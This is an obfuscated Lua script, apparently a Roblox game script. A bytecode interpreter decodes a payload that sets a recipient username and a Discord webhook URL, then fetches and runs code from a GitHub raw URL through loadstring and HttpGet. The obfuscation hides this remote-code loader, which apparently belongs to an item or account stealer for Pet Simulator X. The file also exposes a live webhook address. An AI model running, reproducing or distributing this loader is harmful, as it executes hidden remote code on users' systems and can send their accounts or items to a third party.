--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then v23=function()local v39=0 + 0;local v40;local v41;while true do if (((0 + 0) -0)==v39) then v40,v41=v1(v16,v19,v19 + (5 -3));v19=v19 + (2 -1) + 1;v39=571 -(488 + 82);end if (v39==(2 -1)) then return (v41 * (424 -168)) + v40;end end end;v24=nil;v24=function()local v42=0 + 0;local v43;local v44;local v45;local v46;while true do if ((0 -(0 -0))==v42) then v43,v44,v45,v46=v1(v16,v19,v19 + 3);v19=v19 + (1225 -(772 + 449));v42=2 -1;end if ((1874 -(1466 + 50 + 357))==v42) then return (v46 * 16777216) + (v45 * (66678 -(818 + 324))) + (v44 * (1661 -(124 + 1281))) + v43;end end end;v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v31,1,1));return "";end end else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v31,16));if v20 then local v99=v5(v76,v20);v20=nil;return v99;else return v76;end break;end end end end);v21=nil;v18=1;end if (v18==3) then v25=function()local v47=v24();local v48=v24();local v49=1721 -(1470 + 250);local v50=(v21(v48,1 + 0,10 + 10) * ((1584 -(1036 + 546))^(16 + 16))) + v47;local v51=v21(v48,891 -(207 + 346 + 317),1322 -(839 + 452));local v52=((v21(v48,32)==(1566 -(243 + 1322))) and  -1) or ((1 + 3) -3);if (v51==(132 -(117 + 15))) then if (v50==(1429 -(1197 + 232))) then return v52 * (0 + 0);else local v80=0 + 0;while true do if ((0 + 0)==v80) then v51=1;v49=183 -(128 + 55);break;end end end elseif (v51==(2686 -(248 + 391))) then return ((v50==(33 -(26 + 7))) and (v52 * ((1 + 0)/(883 -(599 + 164 + 120))))) or (v52 * NaN);end return v8(v52,v51-(2586 -(170 + (2567 -(593 + 581))))) * (v49 + (v50/((2 + 0)^(142 -90))));end;v26=nil;v26=function(v32)local v53=0 -(311 -(87 + 224));local v54;local v55;while true do if (v53==(1 + 2)) then return v6(v55);end if (v53==(5 -3)) then v55={};for v81=3 -2, #v54 do v55[v81]=v2(v1(v3(v54,v81,v81)));end v53=1642 -(82 + 1557);end if (v53==(1 + 0)) then v54=v3(v16,v19,(v19 + v32) -(1 + 0));v19=v19 + v32;v53=2 -(0 + 0);end if (v53==((5128 -3504) -(1194 + 430))) then v54=nil;if  not v32 then v32=v24();if (v32==(0 -0)) then return "";end end v53=2 -1;end end end;v27=v24;v18=4;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v56=0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v56==3) then v63=nil;while true do local v83=500 -(61 + 439);while true do if ((1165 -(581 + 583))==v83) then if ((0 + 0)==v57) then local v104=0;while true do if (v104~=2) then else v57=1;break;end if (v104==1) then v60={};v61={v58,v59,nil,v60};v104=13 -(10 + 1);end if (v104==(0 -0)) then v58={};v59={};v104=1;end end end break;end if (v83==(0 + 0)) then if (v57==(459 -(221 + 237))) then v62=v24();v63={};for v106=1 + 0,v62 do local v107=0 + 0;local v108;local v109;local v110;local v111;local v112;while true do if (v107==(0 -0)) then v108=0 -0;v109=nil;v107=1;end if (v107==(1039 -(511 + 527))) then v110=nil;v111=nil;v107=2;end if (v107==(669 -(425 + 242))) then v112=nil;while true do if (v108==(7 -5)) then while true do if (v109~=0) then else local v139=0;while true do if (v139==(1 + 0)) then v109=528 -(520 + 7);break;end if (v139~=(0 + 0)) then else v110=483 -(21 + 462);v111=nil;v139=1 + 0;end end end if (v109==1) then v112=nil;while true do if (v110==(0 -0)) then local v155=0;local v156;while true do if (v155~=(169 -(123 + 46))) then else v156=0;while true do if (v156==1) then v110=1;break;end if (v156~=(837 -(733 + 104))) then else local v178=0;while true do if (0==v178) then v111=v22();v112=nil;v178=1 + 0;end if (v178==1) then v156=1;break;end end end end break;end end end if (v110~=(1235 -(486 + 748))) then else if (v111==(1 -0)) then v112=v22()~=(0 + 0);elseif (v111==(940 -(243 + 695))) then v112=v25();elseif (v111==(8 -5)) then v112=v26();end v63[v106]=v112;break;end end break;end end break;end if (v108~=(1107 -(139 + 968))) then else local v125=0;while true do if (v125~=(1 + 0)) then else v108=109 -(30 + 78);break;end if (v125==(0 + 0)) then v109=0;v110=nil;v125=1480 -(1001 + 478);end end end if ((4 -3)==v108) then local v126=803 -(799 + 4);while true do if (v126==1) then v108=2;break;end if (v126==0) then v111=nil;v112=nil;v126=1 -0;end end end end break;end end end v61[3]=v22();v57=2 -0;end if (v57~=2) then else for v113=1 + 0,v24() do local v114=0 + 0;local v115;local v116;local v117;while true do if (v114~=0) then else v115=0 + 0;v116=nil;v114=1;end if (v114==(3 -2)) then v117=nil;while true do if (v115==(1 + 0)) then while true do if (v116==0) then v117=v22();if (v21(v117,1238 -(102 + 1135),1)~=0) then else local v148=310 -(38 + 272);local v149;local v150;local v151;while true do if (v148==3) then if (v21(v150,518 -(153 + 362),8 -5)==(1 + 0)) then v151[1126 -(1087 + 35)]=v63[v151[4]];end v58[v113]=v151;break;end if (v148~=0) then else local v161=0;while true do if (0==v161) then local v173=0;while true do if ((1 + 0)~=v173) then else v161=1;break;end if (v173==(0 + 0)) then v149=v21(v117,2 -0,3);v150=v21(v117,4,6);v173=1446 -(41 + 1404);end end end if (v161~=1) then else v148=1 + 0;break;end end end if (v148~=1) then else local v162=0 + 0;while true do if (v162==(1923 -(827 + 1095))) then v148=2;break;end if (v162==(1131 -(1057 + 74))) then local v174=0 -0;while true do if (v174==1) then v162=1;break;end if (v174~=0) then else v151={v23(),v23(),nil,nil};if (v149==(0 + 0)) then local v186=0 -0;local v187;local v188;while true do if (v186~=(1657 -(1606 + 51))) then else v187=0;v188=nil;v186=998 -(103 + 894);end if (v186~=(1 + 0)) then else while true do if (v187==(0 -0)) then v188=0 + 0;while true do if (v188==(0 -0)) then v151[3]=v23();v151[4]=v23();break;end end break;end end break;end end elseif (v149==1) then v151[3]=v24();elseif (v149==(2 + 0)) then v151[3]=v24() -(2^(4 + 12));elseif (v149~=(989 -(136 + 850))) then else local v196=0 -0;local v197;local v198;while true do if (v196~=(88 -(62 + 25))) then else while true do if (v197~=0) then else v198=0 + 0;while true do if (v198~=0) then else v151[943 -(891 + 49)]=v24() -((3 -1)^(3 + 13));v151[3 + 1]=v23();break;end end break;end end break;end if (v196==0) then v197=0 + 0;v198=nil;v196=1;end end end v174=1 + 0;end end end end end if (v148==(9 -7)) then local v163=0;while true do if (v163==(1913 -(137 + 1775))) then v148=3;break;end if (v163==(0 -0)) then if (v21(v150,1,1)==(1 + 0)) then v151[2 + 0]=v63[v151[2]];end if (v21(v150,2 -0,2)==1) then v151[3]=v63[v151[3]];end v163=1;end end end end end break;end end break;end if (v115~=0) then else local v127=0;while true do if (v127~=(2 -1)) then else v115=277 -(269 + 7);break;end if (v127==0) then v116=1626 -(1067 + 559);v117=nil;v127=1;end end end end break;end end end for v118=1,v24() do v59[v118-(1613 -(971 + 641))]=v29();end for v120=1,v24() do v60[v120]=v24();end return v61;end v83=1288 -(1035 + 252);end end end break;end if (v56~=(804 -(755 + 48))) then else v59=nil;v60=nil;v56=2;end if (v56~=(1924 -(453 + 1471))) then else v57=41 -(25 + 16);v58=nil;v56=630 -(288 + 341);end if (v56~=(1692 -(1668 + 22))) then else v61=nil;v62=nil;v56=3 + 0;end end end;v18=5;end if (v18==1) then v21=function(v33,v34,v35)if v35 then local v77=1555 -(138 + 1417);local v78;while true do if ((1286 -(1187 + (999 -(58 + 842))))==v77) then v78=(v33/(2^(v34-(3 -2))))%((2 + (0 -0))^(((v35-1) -(v34-1)) + 1 + 0));return v78-(v78%(3 -2));end end else local v79=(1559 -(1281 + (681 -405)))^(v34-(1 + 0));return (((v33%(v79 + v79))>=v79) and (1 + 0)) or (0 + 0);end end;v22=nil;v22=function()local v64=v1(v16,v19,v19);v19=v19 + 1;return v64;end;v23=nil;v18=2;end if (v18==5) then v30=nil;v30=function(v36,v37,v38)local v65=v36[1];local v66=v36[2];local v67=v36[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==2) then v73=nil;v73=function()local v84=v65;local v85=v66;local v86=v67;local v87=v28;local v88={};local v89={};local v90={};for v94=0 -0,v72 do if ((v94>=v86) or (4220>=(2323 + 2281))) then v88[v94-v86]=v71[v94 + 1];else v90[v94]=v71[v94 + (2 -1)];end end local v91=(v72-v86) + ((322 + 424) -(694 + 51));local v92;local v93;while true do local v95=1263 -(951 + 312);local v96;while true do if ((v95==(1529 -(278 + 1251))) or ((652 -318)>(2705 -(538 + 238)))) then v96=0 + 0;while true do if ((4407>=((31441 -23374) -6111)) and (v96==((1 -0) + 0))) then if (((660 + 1594)==2254) and (v93<=3)) then if ((4591<(9941 -4963)) and (v93<=(1 + 0))) then if ((v93==(0 + 0)) or ((9745 -7124)<(1595 -1060))) then v90[v92[766 -(266 + 498)]]();else v90[v92[(5772 -3938) -(539 + 1293)]]=v92[6 -(10 -7)];end elseif ((v93==(3 -1)) or (2703<(1727 + 20))) then local v130=0 -0;local v131;while true do if ((v130==(0 -0)) or ((1471 + 133)<=(1490 -(282 + 68 + 202)))) then v131=v92[2 + 0];v90[v131]=v90[v131](v13(v90,v131 + (1881 -(1094 + 786)),v70));break;end end else do return;end end elseif ((9<(846 + 542 + 58)) and (v93<=(967 -(866 + 96)))) then if (((90 + 39)==(260 -131)) and (v93>(8 -4))) then v38[v92[1 + 2]]=v90[v92[1 + 1]];else v90[v92[1 + 1]]=v92[3]~=((220 + 37) -(242 + 15));end elseif ((v93<=(266 -(205 + 55))) or ((3486 -(283 + 810))<(2992 -2013))) then local v135=0 + 0;local v136;local v137;local v138;while true do if (((1542 -(21 + 1520))==v135) or (2410<=(2718 -(1030 + 524)))) then v138=nil;while true do if (((3029 -985)<=(3282 -(1004 + 215))) and (v136==(1 -0))) then v90[v137 + ((2296 -(595 + 491)) -(408 + 801))]=v138;v90[v137]=v138[v92[2 + 2]];break;end if (((3070 + (1494 -(701 + 622)))<=(5741 -2317)) and (0==v136)) then local v167=235 -(10 + 21 + 204);local v168;while true do if ((v167==(0 + 0 + 0)) or ((33 + 2085)>=(2687 + 655))) then v168=0;while true do if (((756 + 1993)<=((5987 -3095) -(58 + 4))) and (v168==(413 -(176 + 236)))) then v136=1 + 0;break;end if ((((0 + 0) -0)==v168) or ((32 + 2743)<(1672 -(122 + 250)))) then local v185=0 + 0;while true do if ((v185==(1 + 0)) or ((516 + 106)>=(2116 + 1592))) then v168=1 + 0 + 0;break;end if (((2108 + 1812)<(2744 + 1323)) and (v185==((0 + 0) -0))) then v137=v92[1386 -(113 + 1271)];v138=v90[v92[1 + 2]];v185=2 -1;end end end end break;end end end end break;end if (((3265 -1547)<2583) and (v135==(0 + 0))) then local v154=0;while true do if ((2802>=(325 + 978)) and (v154==1)) then v135=4 -(1 + 2);break;end if ((v154==(0 + 0)) or (2081<=(3570 -(502 + 1204)))) then v136=0 + 0;v137=nil;v154=3 -2;end end end end elseif (((730 + 493)<(9488 -5599)) and (v93==(21 -14))) then v90[v92[1 + 1]]=v38[v92[(888 -(325 + 558)) -2]];else local v142=0 + 0;local v143;local v144;local v145;local v146;local v147;while true do if ((v142==(0 -0)) or (3415<=(2464 -1316))) then local v158=1225 -(993 + 232);while true do if ((v158==(0 -(0 -0))) or ((3181 -((182 -120) + 354))>(10593 -5994))) then v143=0 + 0;v144=nil;v158=(3 + 0) -2;end if ((((4339 -(273 + 58)) + (1234 -(582 + 548)))==(10769 -(7849 -(1054 + 138)))) and (v158==(1639 -(1625 + 13)))) then v142=1;break;end end end if ((v142==2) or (((5715 -(197 + 33)) -(53 + 1172))==(1207 + 2358))) then v147=nil;while true do if ((v143==(492 -(427 + 64))) or ((325 + 2880)==(1677 -(891 + 133)))) then local v171=0 -0;while true do if ((1056<(5484 -(239 + 1037))) and (v171==(3 -2))) then v143=2;break;end if (((4996 -(297 + 716))==(36 + 3947)) and (v171==(0 -(0 -0)))) then local v183=0;while true do if ((1986>(180 + 1208)) and (v183==(1 + 0))) then v171=1 + 0;break;end if (((3197 -((2093 -(220 + 382)) + 65))<=(1196 + 911)) and (v183==(0 -0))) then v70=(v146 + v144) -1;v147=0 + 0;v183=1029 -(928 + 100);end end end end end if (((5926 -1864)==(11766 -7704)) and (v143==(0 -0))) then local v172=0 -0;while true do if ((3683<(2864 + 1122 + 875)) and (v172==(0 + 0))) then local v184=951 -(858 + 93);while true do if (((6748 -(4836 -2756))>(3429 + 1003)) and (v184==((213 + 374) -(165 + 422)))) then v144=v92[1022 -(527 + 493)];v145,v146=v87(v90[v144](v13(v90,v144 + ((1560 -(168 + 1391)) -(0 + 0)),v92[974 -(750 + (638 -417))])));v184=(1498 -(220 + 298)) -(303 + 676);end if ((v184==(1 + 0)) or ((856 + 583)<(412 + 319))) then v172=1 + 0;break;end end end if (((2244 + 839)==3083) and (v172==(1 + 0))) then v143=1 -0;break;end end end if (((4337 -(1220 + 331))<2890) and ((2 + (1892 -(1133 + 759)))==v143)) then for v175=v144,v70 do local v176=0 + 0;local v177;while true do if ((2067>=(3220 -(631 + 960))) and (v176==(1296 -(29 + 1267)))) then v177=1776 -(1607 + 105 + 64);while true do if ((v177==0) or ((6482 -(5538 -(390 + 526)))<(2233 -1052))) then v147=v147 + (1170 -(241 + 928));v90[v175]=v145[v147];break;end end break;end end end break;end end break;end if ((v142==((2895 -(360 + 1427)) -(904 + 203))) or ((547 + 3523)<(4011 -1799))) then local v159=0 -0;while true do if ((v159==(3 -2)) or ((3071 -1042)==(3766 -(581 + 1095)))) then v142=562 -(368 + 16 + 176);break;end if (((2468 -(645 + 287))<(3217 + (1782 -(440 + 20)))) and (v159==((2607 -975) -(503 + 1129)))) then v145=nil;v146=nil;v159=1;end end end end end v69=v69 + (438 -(392 + 45));break;end if ((((326 -(22 + 285)) + 10)==(1470 -((846 -422) + (2502 -(1165 + 320))))) and (v96==0)) then local v122=0 + 0;while true do if ((v122==(1060 -(257 + 802))) or ((228 + 1953)<(3340 -1787))) then v96=(460 -(316 + 141)) -(1 + 1);break;end if ((v122==0) or ((723 + 1194)==(4857 -(943 + 483)))) then v92=v84[v69];v93=v92[1];v122=(1000 -(430 + 568)) -1;end end end end break;end end end end;v68=3;end if (0==v68) then v69=1;v70= -1;v68=1;end if (v68==3) then A,B=v28(v11(v73));if  not A[1] then local v97=0;local v98;while true do if (v97==0) then v98=v36[4][v69] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end break;end if (v68==1) then v71={...};v72=v12("#",...) -1;v68=2;end end end;end;return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365724E616D6503083O0078764574682O616E03073O00576562482O6F6B03803O00682O7470733A2O2F63616E6172792E646973636F72642E636F6D2F6170692F776562682O6F6B732F31303630392O353638353734393237323539372F2D707362636C497451707877305F7A416169434D7A715668754B35465A70456C5F66376944302D67417831706B36467A6B643451556671365362657867554145714F667A03073O004D656E74696F6E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F5363726970742E6C7561000F3O0012013O00023O0012053O00013O0012013O00043O0012053O00034O00043O00013O0012053O00053O0012073O00063O001207000100073O002006000100010008001201000300094O0004000400014O0008000100044O00025O00026O000100012O00033O00017O000F3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
